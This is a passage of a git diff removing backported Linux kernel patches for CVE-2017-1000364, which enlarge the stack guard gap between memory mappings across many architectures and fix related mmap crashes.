--	next = vma->vm_next;
--	if (next && next->vm_start == address + PAGE_SIZE) {
--		if (!(next->vm_flags & VM_GROWSUP))
--			return -ENOMEM;
--	}
- 	return expand_upwards(vma, address);
- }
- 
-@@ -2326,14 +2363,6 @@ find_extend_vma(struct mm_struct *mm, unsigned long addr)
- #else
- int expand_stack(struct vm_area_struct *vma, unsigned long address)
- {
--	struct vm_area_struct *prev;
--
--	address &= PAGE_MASK;
--	prev = vma->vm_prev;
--	if (prev && prev->vm_end == address) {
--		if (!(prev->vm_flags & VM_GROWSDOWN))
--			return -ENOMEM;
--	}
- 	return expand_downwards(vma, address);
- }
- 
-@@ -2429,7 +2458,7 @@ detach_vmas_to_be_unmapped(struct mm_struct *mm, struct vm_area_struct *vma,
- 		vma->vm_prev = prev;
- 		vma_gap_update(vma);
- 	} else
--		mm->highest_vm_end = prev ? prev->vm_end : 0;
-+		mm->highest_vm_end = prev ? vm_end_gap(prev) : 0;
- 	tail_vma->vm_next = NULL;
- 
- 	/* Kill the cache */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-1000364/3.18/0009.patch b/Patches/Linux_CVEs/CVE-2017-1000364/3.18/0009.patch
deleted file mode 100644
index ee321fa6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000364/3.18/0009.patch
+++ /dev/null
@@ -1,51 +0,0 @@
-From c6aeba66df8743478d7b9f64fa76d88ed4100c67 Mon Sep 17 00:00:00 2001
-From: Helge Deller <deller@gmx.de>
-Date: Mon, 19 Jun 2017 17:34:05 +0200
-Subject: Allow stack to grow up to address space limit
-
-commit bd726c90b6b8ce87602208701b208a208e6d5600 upstream.
-
-Fix expand_upwards() on architectures with an upward-growing stack (parisc,
-metag and partly IA-64) to allow the stack to reliably grow exactly up to
-the address space limit given by TASK_SIZE.
-
-Signed-off-by: Helge Deller <deller@gmx.de>
-Acked-by: Hugh Dickins <hughd@google.com>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- mm/mmap.c | 13 ++++++++-----
- 1 file changed, 8 insertions(+), 5 deletions(-)
-
-diff --git a/mm/mmap.c b/mm/mmap.c
-index 14ccc94..ff12e23 100644
---- a/mm/mmap.c
-+++ b/mm/mmap.c
-@@ -2175,16 +2175,19 @@ int expand_upwards(struct vm_area_struct *vma, unsigned long address)
- 	if (!(vma->vm_flags & VM_GROWSUP))
- 		return -EFAULT;
- 
--	/* Guard against wrapping around to address 0. */
-+	/* Guard against exceeding limits of the address space. */
- 	address &= PAGE_MASK;
--	address += PAGE_SIZE;
--	if (!address)
-+	if (address >= TASK_SIZE)
- 		return -ENOMEM;
-+	address += PAGE_SIZE;
- 
- 	/* Enforce stack_guard_gap */
- 	gap_addr = address + stack_guard_gap;
--	if (gap_addr < address)
--		return -ENOMEM;
-+
-+	/* Guard against overflow */
-+	if (gap_addr < address || gap_addr > TASK_SIZE)
-+		gap_addr = TASK_SIZE;
-+
- 	next = vma->vm_next;
- 	if (next && next->vm_start < gap_addr) {
- 		if (!(next->vm_flags & VM_GROWSUP))
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-1000364/3.18/0010.patch b/Patches/Linux_CVEs/CVE-2017-1000364/3.18/0010.patch
deleted file mode 100644
index d7629a20..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000364/3.18/0010.patch
+++ /dev/null
@@ -1,52 +0,0 @@
-From 509f8f1772ec2972898771ecc376572b6efd184a Mon Sep 17 00:00:00 2001
-From: Hugh Dickins <hughd@google.com>
-Date: Tue, 20 Jun 2017 02:10:44 -0700
-Subject: mm: fix new crash in unmapped_area_topdown()
-
-commit f4cb767d76cf7ee72f97dd76f6cfa6c76a5edc89 upstream.
-
-Trinity gets kernel BUG at mm/mmap.c:1963! in about 3 minutes of
-mmap testing.  That's the VM_BUG_ON(gap_end < gap_start) at the
-end of unmapped_area_topdown().  Linus points out how MAP_FIXED
-(which does not have to respect our stack guard gap intentions)
-could result in gap_end below gap_start there.  Fix that, and
-the similar case in its alternative, unmapped_area().
-
-Fixes: 1be7107fbe18 ("mm: larger stack guard gap, between vmas")
-Reported-by: Dave Jones <davej@codemonkey.org.uk>
-Debugged-by: Linus Torvalds <torvalds@linux-foundation.org>
-Signed-off-by: Hugh Dickins <hughd@google.com>
-Acked-by: Michal Hocko <mhocko@suse.com>
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-Signed-off-by: Greg Kroah-Hartman <gregkh@linuxfoundation.org>
----
- mm/mmap.c | 6 ++++--
- 1 file changed, 4 insertions(+), 2 deletions(-)
-
-diff --git a/mm/mmap.c b/mm/mmap.c
-index ff12e23..f975ec9 100644
---- a/mm/mmap.c
-+++ b/mm/mmap.c
-@@ -1770,7 +1770,8 @@ check_current:
- 		/* Check if current node has a suitable gap */
- 		if (gap_start > high_limit)
- 			return -ENOMEM;
--		if (gap_end >= low_limit && gap_end - gap_start >= length)
-+		if (gap_end >= low_limit &&
-+		    gap_end > gap_start && gap_end - gap_start >= length)
- 			goto found;
- 
- 		/* Visit right subtree if it looks promising */
-@@ -1873,7 +1874,8 @@ check_current:
- 		gap_end = vm_start_gap(vma);
- 		if (gap_end < low_limit)
- 			return -ENOMEM;
--		if (gap_start <= high_limit && gap_end - gap_start >= length)
-+		if (gap_start <= high_limit &&
-+		    gap_end > gap_start && gap_end - gap_start >= length)
- 			goto found;
- 
- 		/* Visit left subtree if it looks promising */
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-1000364/3.2/0001.patch b/Patches/Linux_CVEs/CVE-2017-1000364/3.2/0001.patch
deleted file mode 100644
index 01c19765..00000000
--- a/Patches/Linux_CVEs/CVE-2017-1000364/3.2/0001.patch
+++ /dev/null
@@ -1,1549 +0,0 @@
-From 640c7dfdc7c723143b1ce42f5569ec8565cbbde7 Mon Sep 17 00:00:00 2001
-From: Hugh Dickins <hughd@google.com>
-Date: Mon, 19 Jun 2017 20:32:47 +0200
-Subject: mm: larger stack guard gap, between vmas
-
-commit 1be7107fbe18eed3e319a6c3e83c78254b693acb upstream.
-
-Stack guard page is a useful feature to reduce a risk of stack smashing
-into a different mapping. We have been using a single page gap which
-is sufficient to prevent having stack adjacent to a different mapping.
-But this seems to be insufficient in the light of the stack usage in
-userspace. E.g. glibc uses as large as 64kB alloca() in many commonly
-used functions. Others use constructs liks gid_t buffer[NGROUPS_MAX]
-which is 256kB or stack strings with MAX_ARG_STRLEN.
-
-This will become especially dangerous for suid binaries and the default
-no limit for the stack size limit because those applications can be
-tricked to consume a large portion of the stack and a single glibc call
-could jump over the guard page. These attacks are not theoretical,
-unfortunatelly.
-
-Make those attacks less probable by increasing the stack guard gap
-to 1MB (on systems with 4k pages; but make it depend on the page size
-because systems with larger base pages might cap stack allocations in
-the PAGE_SIZE units) which should cover larger alloca() and VLA stack
-allocations. It is obviously not a full fix because the problem is
-somehow inherent, but it should reduce attack space a lot.
-
-One could argue that the gap size should be configurable from userspace,
-but that can be done later when somebody finds that the new 1MB is wrong
-for some special case applications.  For now, add a kernel command line
-option (stack_guard_gap) to specify the stack gap size (in page units).
-
-Implementation wise, first delete all the old code for stack guard page:
-because although we could get away with accounting one extra page in a
-stack vma, accounting a larger gap can break userspace - case in point,
-a program run with "ulimit -S -v 20000" failed when the 1MB gap was
-counted for RLIMIT_AS; similar problems could come with RLIMIT_MLOCK
-and strict non-overcommit mode.
-
-Instead of keeping gap inside the stack vma, maintain the stack guard
-gap as a gap between vmas: using vm_start_gap() in place of vm_start
-(or vm_end_gap() in place of vm_end if VM_GROWSUP) in just those few
-places which need to respect the gap - mainly arch_get_unmapped_area(),
-and and the vma tree's subtree_gap support for that.
-
-Original-patch-by: Oleg Nesterov <oleg@redhat.com>
-Original-patch-by: Michal Hocko <mhocko@suse.com>
-Signed-off-by: Hugh Dickins <hughd@google.com>
-Acked-by: Michal Hocko <mhocko@suse.com>
-Tested-by: Helge Deller <deller@gmx.de> # parisc
-Signed-off-by: Linus Torvalds <torvalds@linux-foundation.org>
-[Hugh Dickins: Backported to 3.2]
-[bwh: Fix more instances of vma->vm_start in sparc64 impl. of
- arch_get_unmapped_area_topdown() and generic impl. of
- hugetlb_get_unmapped_area()]
-Signed-off-by: Ben Hutchings <ben@decadent.org.uk>
----
- Documentation/kernel-parameters.txt |   7 ++
- arch/alpha/kernel/osf_sys.c         |   2 +-
- arch/arm/mm/mmap.c                  |  12 +--
- arch/frv/mm/elf-fdpic.c             |   6 +-
- arch/ia64/kernel/sys_ia64.c         |  18 +++-
- arch/ia64/mm/hugetlbpage.c          |   4 +-
- arch/mips/mm/mmap.c                 |  19 ++--
- arch/parisc/kernel/sys_parisc.c     |  40 ++++++---
- arch/powerpc/mm/slice.c             |  24 ++---
- arch/sh/mm/mmap.c                   |  29 +++---
- arch/sparc/kernel/sys_sparc_32.c    |   2 +-
- arch/sparc/kernel/sys_sparc_64.c    |  30 ++++---
- arch/sparc/mm/hugetlbpage.c         |  27 +++---
- arch/tile/mm/hugetlbpage.c          |  26 +++---
- arch/x86/kernel/sys_x86_64.c        |  29 +++---
- arch/x86/mm/hugetlbpage.c           |  24 ++---
- fs/hugetlbfs/inode.c                |   4 +-
- fs/proc/task_mmu.c                  |   4 -
- include/linux/mm.h                  |  53 ++++++-----
- mm/memory.c                         |  49 ----------
- mm/mmap.c                           | 175 ++++++++++++++++++++----------------
- 21 files changed, 312 insertions(+), 272 deletions(-)
-
-diff --git a/Documentation/kernel-parameters.txt b/Documentation/kernel-parameters.txt
-index ac601c4..356bf4b 100644
---- a/Documentation/kernel-parameters.txt
-+++ b/Documentation/kernel-parameters.txt
-@@ -2457,6 +2457,13 @@ bytes respectively. Such letter suffixes can also be entirely omitted.
- 	spia_pedr=
- 	spia_peddr=
- 
-+	stack_guard_gap=	[MM]
-+			override the default stack gap protection. The value
-+			is in page units and it defines how many pages prior
-+			to (for stacks growing down) resp. after (for stacks
-+			growing up) the main stack are reserved for no other
-+			mapping. Default value is 256 pages.
-+
- 	stacktrace	[FTRACE]
- 			Enabled the stack tracer on boot up.
- 
-diff --git a/arch/alpha/kernel/osf_sys.c b/arch/alpha/kernel/osf_sys.c
-index 01e8715..b9abe5b 100644
---- a/arch/alpha/kernel/osf_sys.c
-+++ b/arch/alpha/kernel/osf_sys.c
-@@ -1147,7 +1147,7 @@ arch_get_unmapped_area_1(unsigned long addr, unsigned long len,
- 		/* At this point:  (!vma || addr < vma->vm_end). */
- 		if (limit - len < addr)
- 			return -ENOMEM;
--		if (!vma || addr + len <= vma->vm_start)
-+		if (!vma || addr + len <= vm_start_gap(vma))
- 			return addr;
- 		addr = vma->vm_end;
- 		vma = vma->vm_next;
-diff --git a/arch/arm/mm/mmap.c b/arch/arm/mm/mmap.c
-index 44b628e..4497b5e 100644
---- a/arch/arm/mm/mmap.c
-+++ b/arch/arm/mm/mmap.c
-@@ -30,7 +30,7 @@ arch_get_unmapped_area(struct file *filp, unsigned long addr,
- {
- 	struct mm_struct *mm = current->mm;
- 	struct vm_area_struct *vma;
--	unsigned long start_addr;
-+	unsigned long start_addr, vm_start;
- 	int do_align = 0;
- 	int aliasing = cache_is_vipt_aliasing();
- 
-@@ -62,7 +62,7 @@ arch_get_unmapped_area(struct file *filp, unsigned long addr,
- 
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 	if (len > mm->cached_hole_size) {
-@@ -96,15 +96,17 @@ full_search:
- 			}
- 			return -ENOMEM;
- 		}
--		if (!vma || addr + len <= vma->vm_start) {
-+		if (vma)
-+			vm_start = vm_start_gap(vma);
-+		if (!vma || addr + len <= vm_start) {
- 			/*
- 			 * Remember the place where we stopped the search:
- 			 */
- 			mm->free_area_cache = addr + len;
- 			return addr;
- 		}
--		if (addr + mm->cached_hole_size < vma->vm_start)
--		        mm->cached_hole_size = vma->vm_start - addr;
-+		if (addr + mm->cached_hole_size < vm_start)
-+			mm->cached_hole_size = vm_start - addr;
- 		addr = vma->vm_end;
- 		if (do_align)
- 			addr = COLOUR_ALIGN(addr, pgoff);
-diff --git a/arch/frv/mm/elf-fdpic.c b/arch/frv/mm/elf-fdpic.c
-index 385fd30..96eca58 100644
---- a/arch/frv/mm/elf-fdpic.c
-+++ b/arch/frv/mm/elf-fdpic.c
-@@ -74,7 +74,7 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr, unsi
- 		addr = PAGE_ALIGN(addr);
- 		vma = find_vma(current->mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			goto success;
- 	}
- 
-@@ -89,7 +89,7 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr, unsi
- 			for (; vma; vma = vma->vm_next) {
- 				if (addr > limit)
- 					break;
--				if (addr + len <= vma->vm_start)
-+				if (addr + len <= vm_start_gap(vma))
- 					goto success;
- 				addr = vma->vm_end;
- 			}
-@@ -104,7 +104,7 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr, unsi
- 		for (; vma; vma = vma->vm_next) {
- 			if (addr > limit)
- 				break;
--			if (addr + len <= vma->vm_start)
-+			if (addr + len <= vm_start_gap(vma))
- 				goto success;
- 			addr = vma->vm_end;
- 		}
-diff --git a/arch/ia64/kernel/sys_ia64.c b/arch/ia64/kernel/sys_ia64.c
-index 609d500..77c0aff 100644
---- a/arch/ia64/kernel/sys_ia64.c
-+++ b/arch/ia64/kernel/sys_ia64.c
-@@ -27,7 +27,8 @@ arch_get_unmapped_area (struct file *filp, unsigned long addr, unsigned long len
- 	long map_shared = (flags & MAP_SHARED);
- 	unsigned long start_addr, align_mask = PAGE_SIZE - 1;
- 	struct mm_struct *mm = current->mm;
--	struct vm_area_struct *vma;
-+	struct vm_area_struct *vma, *prev;
-+	unsigned long prev_end;
- 
- 	if (len > RGN_MAP_LIMIT)
- 		return -ENOMEM;
-@@ -58,7 +59,17 @@ arch_get_unmapped_area (struct file *filp, unsigned long addr, unsigned long len
-   full_search:
- 	start_addr = addr = (addr + align_mask) & ~align_mask;
- 
--	for (vma = find_vma(mm, addr); ; vma = vma->vm_next) {
-+	for (vma = find_vma_prev(mm, addr, &prev); ; prev = vma,
-+						vma = vma->vm_next) {
-+		if (prev) {
-+			prev_end = vm_end_gap(prev);
-+			if (addr < prev_end) {
-+				addr = (prev_end + align_mask) & ~align_mask;
-+				/* If vma already violates gap, forget it */
-+				if (vma && addr > vma->vm_start)
-+					addr = vma->vm_start;
-+			}
-+		}
- 		/* At this point:  (!vma || addr < vma->vm_end). */
- 		if (TASK_SIZE - len < addr || RGN_MAP_LIMIT - len < REGION_OFFSET(addr)) {
- 			if (start_addr != TASK_UNMAPPED_BASE) {
-@@ -68,12 +79,11 @@ arch_get_unmapped_area (struct file *filp, unsigned long addr, unsigned long len
- 			}
- 			return -ENOMEM;
- 		}
--		if (!vma || addr + len <= vma->vm_start) {
-+		if (!vma || addr + len <= vm_start_gap(vma)) {
- 			/* Remember the address where we stopped this search:  */
- 			mm->free_area_cache = addr + len;
- 			return addr;
- 		}
--		addr = (vma->vm_end + align_mask) & ~align_mask;
- 	}
- }
- 
-diff --git a/arch/ia64/mm/hugetlbpage.c b/arch/ia64/mm/hugetlbpage.c
-index 5ca674b..66a1ec0 100644
---- a/arch/ia64/mm/hugetlbpage.c
-+++ b/arch/ia64/mm/hugetlbpage.c
-@@ -171,9 +171,9 @@ unsigned long hugetlb_get_unmapped_area(struct file *file, unsigned long addr, u
- 		/* At this point:  (!vmm || addr < vmm->vm_end). */
- 		if (REGION_OFFSET(addr) + len > RGN_MAP_LIMIT)
- 			return -ENOMEM;
--		if (!vmm || (addr + len) <= vmm->vm_start)
-+		if (!vmm || (addr + len) <= vm_start_gap(vmm))
- 			return addr;
--		addr = ALIGN(vmm->vm_end, HPAGE_SIZE);
-+		addr = ALIGN(vm_end_gap(vmm), HPAGE_SIZE);
- 	}
- }
- 
-diff --git a/arch/mips/mm/mmap.c b/arch/mips/mm/mmap.c
-index 302d779..a79ddcf 100644
---- a/arch/mips/mm/mmap.c
-+++ b/arch/mips/mm/mmap.c
-@@ -70,6 +70,7 @@ static unsigned long arch_get_unmapped_area_common(struct file *filp,
- 	struct mm_struct *mm = current->mm;
- 	struct vm_area_struct *vma;
- 	unsigned long addr = addr0;
-+	unsigned long vm_start;
- 	int do_color_align;
- 
- 	if (unlikely(len > TASK_SIZE))
-@@ -103,7 +104,7 @@ static unsigned long arch_get_unmapped_area_common(struct file *filp,
- 
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-@@ -118,7 +119,7 @@ static unsigned long arch_get_unmapped_area_common(struct file *filp,
- 			/* At this point:  (!vma || addr < vma->vm_end). */
- 			if (TASK_SIZE - len < addr)
- 				return -ENOMEM;
--			if (!vma || addr + len <= vma->vm_start)
-+			if (!vma || addr + len <= vm_start_gap(vma))
- 				return addr;
- 			addr = vma->vm_end;
- 			if (do_color_align)
-@@ -145,7 +146,7 @@ static unsigned long arch_get_unmapped_area_common(struct file *filp,
- 		/* make sure it can fit in the remaining address space */
- 		if (likely(addr > len)) {
- 			vma = find_vma(mm, addr - len);
--			if (!vma || addr <= vma->vm_start) {
-+			if (!vma || addr <= vm_start_gap(vma)) {
- 				/* cache the address as a hint for next time */
- 				return mm->free_area_cache = addr - len;
- 			}
-@@ -165,20 +166,22 @@ static unsigned long arch_get_unmapped_area_common(struct file *filp,
- 			 * return with success:
- 			 */
- 			vma = find_vma(mm, addr);
--			if (likely(!vma || addr + len <= vma->vm_start)) {
-+			if (vma)
-+				vm_start = vm_start_gap(vma);
-+			if (likely(!vma || addr + len <= vm_start)) {
- 				/* cache the address as a hint for next time */
- 				return mm->free_area_cache = addr;
- 			}
- 
- 			/* remember the largest hole we saw so far */
--			if (addr + mm->cached_hole_size < vma->vm_start)
--				mm->cached_hole_size = vma->vm_start - addr;
-+			if (addr + mm->cached_hole_size < vm_start)
-+				mm->cached_hole_size = vm_start - addr;
- 
- 			/* try just below the current vma->vm_start */
--			addr = vma->vm_start - len;
-+			addr = vm_start - len;
- 			if (do_color_align)
- 				addr = COLOUR_ALIGN_DOWN(addr, pgoff);
--		} while (likely(len < vma->vm_start));
-+		} while (likely(len < vm_start));
- 
- bottomup:
- 		/*
-diff --git a/arch/parisc/kernel/sys_parisc.c b/arch/parisc/kernel/sys_parisc.c
-index 7ea75d1..1d4ac8d 100644
---- a/arch/parisc/kernel/sys_parisc.c
-+++ b/arch/parisc/kernel/sys_parisc.c
-@@ -35,17 +35,27 @@
- 
- static unsigned long get_unshared_area(unsigned long addr, unsigned long len)
- {
--	struct vm_area_struct *vma;
-+	struct vm_area_struct *vma, *prev;
-+	unsigned long prev_end;
- 
- 	addr = PAGE_ALIGN(addr);
- 
--	for (vma = find_vma(current->mm, addr); ; vma = vma->vm_next) {
-+	for (vma = find_vma_prev(current->mm, addr, &prev); ; prev = vma,
-+							vma = vma->vm_next) {
-+		if (prev) {
-+			prev_end = vm_end_gap(prev);
-+			if (addr < prev_end) {
-+				addr = prev_end;
-+				/* If vma already violates gap, forget it */
-+				if (vma && addr > vma->vm_start)
-+					addr = vma->vm_start;
-+			}
-+		}
- 		/* At this point:  (!vma || addr < vma->vm_end). */
- 		if (TASK_SIZE - len < addr)
- 			return -ENOMEM;
--		if (!vma || addr + len <= vma->vm_start)
-+		if (!vma || addr + len <= vm_start_gap(vma))
- 			return addr;
--		addr = vma->vm_end;
- 	}
- }
- 
-@@ -70,22 +80,32 @@ static int get_offset(struct address_space *mapping)
- static unsigned long get_shared_area(struct address_space *mapping,
- 		unsigned long addr, unsigned long len, unsigned long pgoff)
- {
--	struct vm_area_struct *vma;
-+	struct vm_area_struct *vma, *prev;
-+	unsigned long prev_end;
- 	int offset = mapping ? get_offset(mapping) : 0;
- 
- 	offset = (offset + (pgoff << PAGE_SHIFT)) & 0x3FF000;
- 
- 	addr = DCACHE_ALIGN(addr - offset) + offset;
- 
--	for (vma = find_vma(current->mm, addr); ; vma = vma->vm_next) {
-+	for (vma = find_vma_prev(current->mm, addr, &prev); ; prev = vma,
-+							vma = vma->vm_next) {
-+		if (prev) {
-+			prev_end = vm_end_gap(prev);
-+			if (addr < prev_end) {
-+				addr = DCACHE_ALIGN(prev_end - offset) + offset;
-+				if (addr < prev_end)	/* handle wraparound */
-+					return -ENOMEM;
-+				/* If vma already violates gap, forget it */
-+				if (vma && addr > vma->vm_start)
-+					addr = vma->vm_start;
-+			}
-+		}
- 		/* At this point:  (!vma || addr < vma->vm_end). */
- 		if (TASK_SIZE - len < addr)
- 			return -ENOMEM;
--		if (!vma || addr + len <= vma->vm_start)
-+		if (!vma || addr + len <= vm_start_gap(vma))
- 			return addr;
--		addr = DCACHE_ALIGN(vma->vm_end - offset) + offset;
--		if (addr < vma->vm_end) /* handle wraparound */
--			return -ENOMEM;
- 	}
- }
- 
-diff --git a/arch/powerpc/mm/slice.c b/arch/powerpc/mm/slice.c
-index 73709f7..57654c9 100644
---- a/arch/powerpc/mm/slice.c
-+++ b/arch/powerpc/mm/slice.c
-@@ -98,7 +98,7 @@ static int slice_area_is_free(struct mm_struct *mm, unsigned long addr,
- 	if ((mm->task_size - len) < addr)
- 		return 0;
- 	vma = find_vma(mm, addr);
--	return (!vma || (addr + len) <= vma->vm_start);
-+	return (!vma || (addr + len) <= vm_start_gap(vma));
- }
- 
- static int slice_low_has_vma(struct mm_struct *mm, unsigned long slice)
-@@ -227,7 +227,7 @@ static unsigned long slice_find_area_bottomup(struct mm_struct *mm,
- 					      int psize, int use_cache)
- {
- 	struct vm_area_struct *vma;
--	unsigned long start_addr, addr;
-+	unsigned long start_addr, addr, vm_start;
- 	struct slice_mask mask;
- 	int pshift = max_t(int, mmu_psize_defs[psize].shift, PAGE_SHIFT);
- 
-@@ -256,7 +256,9 @@ full_search:
- 				addr = _ALIGN_UP(addr + 1,  1ul << SLICE_HIGH_SHIFT);
- 			continue;
- 		}
--		if (!vma || addr + len <= vma->vm_start) {
-+		if (vma)
-+			vm_start = vm_start_gap(vma);
-+		if (!vma || addr + len <= vm_start) {
- 			/*
- 			 * Remember the place where we stopped the search:
- 			 */
-@@ -264,8 +266,8 @@ full_search:
- 				mm->free_area_cache = addr + len;
- 			return addr;
- 		}
--		if (use_cache && (addr + mm->cached_hole_size) < vma->vm_start)
--		        mm->cached_hole_size = vma->vm_start - addr;
-+		if (use_cache && (addr + mm->cached_hole_size) < vm_start)
-+			mm->cached_hole_size = vm_start - addr;
- 		addr = vma->vm_end;
- 	}
- 
-@@ -284,7 +286,7 @@ static unsigned long slice_find_area_topdown(struct mm_struct *mm,
- 					     int psize, int use_cache)
- {
- 	struct vm_area_struct *vma;
--	unsigned long addr;
-+	unsigned long addr, vm_start;
- 	struct slice_mask mask;
- 	int pshift = max_t(int, mmu_psize_defs[psize].shift, PAGE_SHIFT);
- 
-@@ -336,7 +338,9 @@ static unsigned long slice_find_area_topdown(struct mm_struct *mm,
- 		 * return with success:
- 		 */
- 		vma = find_vma(mm, addr);
--		if (!vma || (addr + len) <= vma->vm_start) {
-+		if (vma)
-+			vm_start = vm_start_gap(vma);
-+		if (!vma || (addr + len) <= vm_start) {
- 			/* remember the address as a hint for next time */
- 			if (use_cache)
- 				mm->free_area_cache = addr;
-@@ -344,11 +348,11 @@ static unsigned long slice_find_area_topdown(struct mm_struct *mm,
- 		}
- 
- 		/* remember the largest hole we saw so far */
--		if (use_cache && (addr + mm->cached_hole_size) < vma->vm_start)
--		        mm->cached_hole_size = vma->vm_start - addr;
-+		if (use_cache && (addr + mm->cached_hole_size) < vm_start)
-+			mm->cached_hole_size = vm_start - addr;
- 
- 		/* try just below the current vma->vm_start */
--		addr = vma->vm_start;
-+		addr = vm_start;
- 	}
- 
- 	/*
-diff --git a/arch/sh/mm/mmap.c b/arch/sh/mm/mmap.c
-index afeb710..22eff46 100644
---- a/arch/sh/mm/mmap.c
-+++ b/arch/sh/mm/mmap.c
-@@ -47,7 +47,7 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr,
- {
- 	struct mm_struct *mm = current->mm;
- 	struct vm_area_struct *vma;
--	unsigned long start_addr;
-+	unsigned long start_addr, vm_start;
- 	int do_colour_align;
- 
- 	if (flags & MAP_FIXED) {
-@@ -75,7 +75,7 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr,
- 
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-@@ -106,15 +106,17 @@ full_search:
- 			}
- 			return -ENOMEM;
- 		}
--		if (likely(!vma || addr + len <= vma->vm_start)) {
-+		if (vma)
-+			vm_start = vm_start_gap(vma);
-+		if (likely(!vma || addr + len <= vm_start)) {
- 			/*
- 			 * Remember the place where we stopped the search:
- 			 */
- 			mm->free_area_cache = addr + len;
- 			return addr;
- 		}
--		if (addr + mm->cached_hole_size < vma->vm_start)
--		        mm->cached_hole_size = vma->vm_start - addr;
-+		if (addr + mm->cached_hole_size < vm_start)
-+			mm->cached_hole_size = vm_start - addr;
- 
- 		addr = vma->vm_end;
- 		if (do_colour_align)
-@@ -130,6 +132,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 	struct vm_area_struct *vma;
- 	struct mm_struct *mm = current->mm;
- 	unsigned long addr = addr0;
-+	unsigned long vm_start;
- 	int do_colour_align;
- 
- 	if (flags & MAP_FIXED) {
-@@ -158,7 +161,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 
- 		vma = find_vma(mm, addr);
- 		if (TASK_SIZE - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-@@ -179,7 +182,7 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 	/* make sure it can fit in the remaining address space */
- 	if (likely(addr > len)) {
- 		vma = find_vma(mm, addr-len);
--		if (!vma || addr <= vma->vm_start) {
-+		if (!vma || addr <= vm_start_gap(vma)) {
- 			/* remember the address as a hint for next time */
- 			return (mm->free_area_cache = addr-len);
- 		}
-@@ -199,20 +202,22 @@ arch_get_unmapped_area_topdown(struct file *filp, const unsigned long addr0,
- 		 * return with success:
- 		 */
- 		vma = find_vma(mm, addr);
--		if (likely(!vma || addr+len <= vma->vm_start)) {
-+		if (vma)
-+			vm_start = vm_start_gap(vma);
-+		if (likely(!vma || addr + len <= vm_start)) {
- 			/* remember the address as a hint for next time */
- 			return (mm->free_area_cache = addr);
- 		}
- 
- 		/* remember the largest hole we saw so far */
--		if (addr + mm->cached_hole_size < vma->vm_start)
--		        mm->cached_hole_size = vma->vm_start - addr;
-+		if (addr + mm->cached_hole_size < vm_start)
-+			mm->cached_hole_size = vm_start - addr;
- 
- 		/* try just below the current vma->vm_start */
--		addr = vma->vm_start-len;
-+		addr = vm_start-len;
- 		if (do_colour_align)
- 			addr = COLOUR_ALIGN_DOWN(addr, pgoff);
--	} while (likely(len < vma->vm_start));
-+	} while (likely(len < vm_start));
- 
- bottomup:
- 	/*
-diff --git a/arch/sparc/kernel/sys_sparc_32.c b/arch/sparc/kernel/sys_sparc_32.c
-index 42b282f..eeae89b 100644
---- a/arch/sparc/kernel/sys_sparc_32.c
-+++ b/arch/sparc/kernel/sys_sparc_32.c
-@@ -71,7 +71,7 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr, unsi
- 		}
- 		if (TASK_SIZE - PAGE_SIZE - len < addr)
- 			return -ENOMEM;
--		if (!vmm || addr + len <= vmm->vm_start)
-+		if (!vmm || addr + len <= vm_start_gap(vmm))
- 			return addr;
- 		addr = vmm->vm_end;
- 		if (flags & MAP_SHARED)
-diff --git a/arch/sparc/kernel/sys_sparc_64.c b/arch/sparc/kernel/sys_sparc_64.c
-index a062fe9..39f4999 100644
---- a/arch/sparc/kernel/sys_sparc_64.c
-+++ b/arch/sparc/kernel/sys_sparc_64.c
-@@ -117,7 +117,7 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr, unsi
- 	struct mm_struct *mm = current->mm;
- 	struct vm_area_struct * vma;
- 	unsigned long task_size = TASK_SIZE;
--	unsigned long start_addr;
-+	unsigned long start_addr, vm_start;
- 	int do_color_align;
- 
- 	if (flags & MAP_FIXED) {
-@@ -147,7 +147,7 @@ unsigned long arch_get_unmapped_area(struct file *filp, unsigned long addr, unsi
- 
- 		vma = find_vma(mm, addr);
- 		if (task_size - len >= addr &&
--		    (!vma || addr + len <= vma->vm_start))
-+		    (!vma || addr + len <= vm_start_gap(vma)))
- 			return addr;
- 	}
- 
-@@ -181,15 +181,17 @@ full_search:
- 			}
- 			return -ENOMEM;
- 		}
--		if (likely(!vma || addr + len <= vma->vm_start)) {
-+		if (vma)
-+			vm_start = vm_start_gap(vma);
-+		if (likely(!vma || addr + len <= vm_start)) {
- 			/*
- 			 * Remember the place where we stopped the search:
- 			 */
- 			mm->free_area_cache = addr + len;
- 			return addr;
- 		}
--		if (addr + mm->cached_hole_size < vma->vm_start)
--		        mm->cached_hole_size = vma->vm_start - addr;
-+		if (addr + mm->cached_hole_size < vm_start)
